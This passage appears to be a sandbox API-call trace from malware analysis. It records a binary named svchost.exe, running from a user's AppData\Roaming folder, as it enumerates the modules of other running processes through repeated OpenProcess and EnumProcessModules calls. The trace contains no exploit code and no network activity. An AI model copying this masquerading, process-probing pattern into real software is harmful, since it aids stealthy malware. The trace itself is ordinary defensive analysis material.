CoTaskMemFree (pv=0xd91f20) [0064.151] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.151] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.151] CoTaskMemFree (pv=0xd91f20) [0064.152] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24c0f48, cb=0x18 | out: lpmodinfo=0x24c0f48*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.152] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.152] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.153] CoTaskMemFree (pv=0xd91f20) [0064.153] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.153] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.154] CoTaskMemFree (pv=0xd91f20) [0064.154] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24c3108, cb=0x18 | out: lpmodinfo=0x24c3108*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.154] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.155] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.155] CoTaskMemFree (pv=0xd91f20) [0064.155] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.155] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.156] CoTaskMemFree (pv=0xd91f20) [0064.156] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24c52d8, cb=0x18 | out: lpmodinfo=0x24c52d8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.157] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.157] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.157] CoTaskMemFree (pv=0xd91f20) [0064.157] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.158] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.158] CoTaskMemFree (pv=0xd91f20) [0064.158] CloseHandle (hObject=0x214) returned 1 [0064.160] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.160] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa6c) returned 0x214 [0064.160] EnumProcessModules (in: hProcess=0x214, lphModule=0x24c79f8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24c79f8, lpcbNeeded=0x23ee40) returned 1 [0064.161] GetModuleInformation (in: hProcess=0x214, hModule=0xd70000, lpmodinfo=0x24c7c68, cb=0x18 | out: lpmodinfo=0x24c7c68*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0064.161] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.161] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xd70000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="death_n't_still.exe") returned 0x13 [0064.162] CoTaskMemFree (pv=0xd91f20) [0064.162] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.162] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xd70000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\death_n't_still.exe" (normalized: "c:\\program files\\windowspowershell\\death_n't_still.exe")) returned 0x36 [0064.162] CoTaskMemFree (pv=0xd91f20) [0064.162] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24c9ea0, cb=0x18 | out: lpmodinfo=0x24c9ea0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.163] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.163] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.163] CoTaskMemFree (pv=0xd91f20) [0064.163] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.163] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.164] CoTaskMemFree (pv=0xd91f20) [0064.164] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24cc078, cb=0x18 | out: lpmodinfo=0x24cc078*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.165] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.165] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.166] CoTaskMemFree (pv=0xd91f20) [0064.166] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.166] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.166] CoTaskMemFree (pv=0xd91f20) [0064.166] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24ce238, cb=0x18 | out: lpmodinfo=0x24ce238*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.167] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.167] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.168] CoTaskMemFree (pv=0xd91f20) [0064.168] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.168] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.168] CoTaskMemFree (pv=0xd91f20) [0064.168] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24d0408, cb=0x18 | out: lpmodinfo=0x24d0408*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.169] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.169] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.170] CoTaskMemFree (pv=0xd91f20) [0064.170] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.170] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.171] CoTaskMemFree (pv=0xd91f20) [0064.171] CloseHandle (hObject=0x214) returned 1 [0064.172] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x214 [0064.173] EnumProcessModules (in: hProcess=0x214, lphModule=0x24d2b28, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24d2b28, lpcbNeeded=0x23ee40) returned 1 [0064.173] GetModuleInformation (in: hProcess=0x214, hModule=0x340000, lpmodinfo=0x24d2d98, cb=0x18 | out: lpmodinfo=0x24d2d98*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0064.174] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.174] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x340000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ccv_server.exe") returned 0xe [0064.174] CoTaskMemFree (pv=0xd91f20) [0064.174] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.174] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x340000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\ccv_server.exe" (normalized: "c:\\program files (x86)\\windows mail\\ccv_server.exe")) returned 0x32 [0064.175] CoTaskMemFree (pv=0xd91f20) [0064.175] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24d4fc0, cb=0x18 | out: lpmodinfo=0x24d4fc0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.175] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.175] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.176] CoTaskMemFree (pv=0xd91f20) [0064.176] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.176] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.177] CoTaskMemFree (pv=0xd91f20) [0064.177] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24d7180, cb=0x18 | out: lpmodinfo=0x24d7180*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.177] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.177] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.178] CoTaskMemFree (pv=0xd91f20) [0064.178] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.178] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.179] CoTaskMemFree (pv=0xd91f20) [0064.179] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24d9340, cb=0x18 | out: lpmodinfo=0x24d9340*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.179] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.179] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.180] CoTaskMemFree (pv=0xd91f20) [0064.180] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.180] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.181] CoTaskMemFree (pv=0xd91f20) [0064.181] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24db510, cb=0x18 | out: lpmodinfo=0x24db510*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.189] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.189] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.189] CoTaskMemFree (pv=0xd91f20) [0064.189] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.190] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.190] CoTaskMemFree (pv=0xd91f20) [0064.190] CloseHandle (hObject=0x214) returned 1 [0064.192] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.192] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x214 [0064.192] EnumProcessModules (in: hProcess=0x214, lphModule=0x24ddc30, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24ddc30, lpcbNeeded=0x23ee40) returned 1 [0064.193] GetModuleInformation (in: hProcess=0x214, hModule=0x260000, lpmodinfo=0x24ddea0, cb=0x18 | out: lpmodinfo=0x24ddea0*(lpBaseOfDll=0x260000, SizeOfImage=0x17000, EntryPoint=0x2614a1)) returned 1 [0064.193] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.193] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x260000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="assume on.exe") returned 0xd [0064.194] CoTaskMemFree (pv=0xd91f20) [0064.194] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.194] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x260000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Uninstall Information\\assume on.exe" (normalized: "c:\\program files (x86)\\uninstall information\\assume on.exe")) returned 0x3a [0064.194] CoTaskMemFree (pv=0xd91f20) [0064.195] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24e00f0, cb=0x18 | out: lpmodinfo=0x24e00f0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.195] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.195] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.195] CoTaskMemFree (pv=0xd91f20) [0064.196] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.196] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.197] CoTaskMemFree (pv=0xd91f20) [0064.197] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24e22b0, cb=0x18 | out: lpmodinfo=0x24e22b0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.197] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.197] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.198] CoTaskMemFree (pv=0xd91f20) [0064.198] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.198] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.199] CoTaskMemFree (pv=0xd91f20) [0064.199] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24e4470, cb=0x18 | out: lpmodinfo=0x24e4470*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.199] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.199] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.200] CoTaskMemFree (pv=0xd91f20) [0064.200] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.200] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.201] CoTaskMemFree (pv=0xd91f20) [0064.201] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24e6640, cb=0x18 | out: lpmodinfo=0x24e6640*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.201] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.201] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.202] CoTaskMemFree (pv=0xd91f20) [0064.202] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.202] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.203] CoTaskMemFree (pv=0xd91f20) [0064.203] CloseHandle (hObject=0x214) returned 1 [0064.204] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0064.205] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb70) returned 0x214 [0064.205] EnumProcessModules (in: hProcess=0x214, lphModule=0x24e8d60, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24e8d60, lpcbNeeded=0x23ee40) returned 1 [0064.205] GetModuleInformation (in: hProcess=0x214, hModule=0x1280000, lpmodinfo=0x24e8fd0, cb=0x18 | out: lpmodinfo=0x24e8fd0*(lpBaseOfDll=0x1280000, SizeOfImage=0x17000, EntryPoint=0x12814a1)) returned 1 [0064.206] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.206] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x1280000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0064.206] CoTaskMemFree (pv=0xd91f20) [0064.206] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.206] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x1280000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Media Player\\gmailnotifierpro.exe" (normalized: "c:\\program files\\windows media player\\gmailnotifierpro.exe")) returned 0x3a [0064.207] CoTaskMemFree (pv=0xd91f20) [0064.207] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24eb218, cb=0x18 | out: lpmodinfo=0x24eb218*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.207] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.207] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.208] CoTaskMemFree (pv=0xd91f20) [0064.208] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.208] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.208] CoTaskMemFree (pv=0xd91f20) [0064.208] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x24ed3d8, cb=0x18 | out: lpmodinfo=0x24ed3d8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0064.209] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.209] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0064.209] CoTaskMemFree (pv=0xd91f20) [0064.209] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.209] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0064.210] CoTaskMemFree (pv=0xd91f20) [0064.210] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x24ef598, cb=0x18 | out: lpmodinfo=0x24ef598*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0064.210] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.210] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0064.211] CoTaskMemFree (pv=0xd91f20) [0064.211] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.211] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0064.211] CoTaskMemFree (pv=0xd91f20) [0064.211] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x24f1768, cb=0x18 | out: lpmodinfo=0x24f1768*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0064.212] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.212] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0064.213] CoTaskMemFree (pv=0xd91f20) [0064.213] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.213] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0064.213] CoTaskMemFree (pv=0xd91f20) [0064.213] CloseHandle (hObject=0x214) returned 1 [0064.214] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x214 [0064.214] EnumProcessModules (in: hProcess=0x214, lphModule=0x24f3ea0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24f3ea0, lpcbNeeded=0x23ee40) returned 1 [0064.223] EnumProcessModules (in: hProcess=0x214, lphModule=0x24f40b8, cb=0x400, lpcbNeeded=0x23ee40 | out: lphModule=0x24f40b8, lpcbNeeded=0x23ee40) returned 1 [0064.233] EnumProcessModules (in: hProcess=0x214, lphModule=0x24f44d0, cb=0x800, lpcbNeeded=0x23ee40 | out: lphModule=0x24f44d0, lpcbNeeded=0x23ee40) returned 1 [0064.242] GetModuleInformation (in: hProcess=0x214, hModule=0xff760000, lpmodinfo=0x24f4d40, cb=0x18 | out: lpmodinfo=0x24f4d40*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0064.242] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.242] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff760000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0064.242] CoTaskMemFree (pv=0xd91f20) [0064.243] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.243] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff760000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0064.243] CoTaskMemFree (pv=0xd91f20) [0064.243] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24f6f38, cb=0x18 | out: lpmodinfo=0x24f6f38*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0064.244] CoTaskMemAlloc (cb=0x804) returned 0xd91f20 [0064.244] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0064.244] CoTaskMemFree (pv=0xd91f20) [0064.244] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0064.245] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x24f90f8, cb=0x18 | out: lpmodinfo=0x24f90f8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0064.245] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0064.246] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0064.246] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x24fb2c8, cb=0x18 | out: lpmodinfo=0x24fb2c8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0064.247] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0064.247] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0064.248] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x24fd498, cb=0x18 | out: lpmodinfo=0x24fd498*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0064.248] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0064.249] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0064.249] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24ff6b0, cb=0x18 | out: lpmodinfo=0x24ff6b0*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0064.250] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd91f20, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0064.251] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd91f20, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0064.251] GetModuleInformation (in: 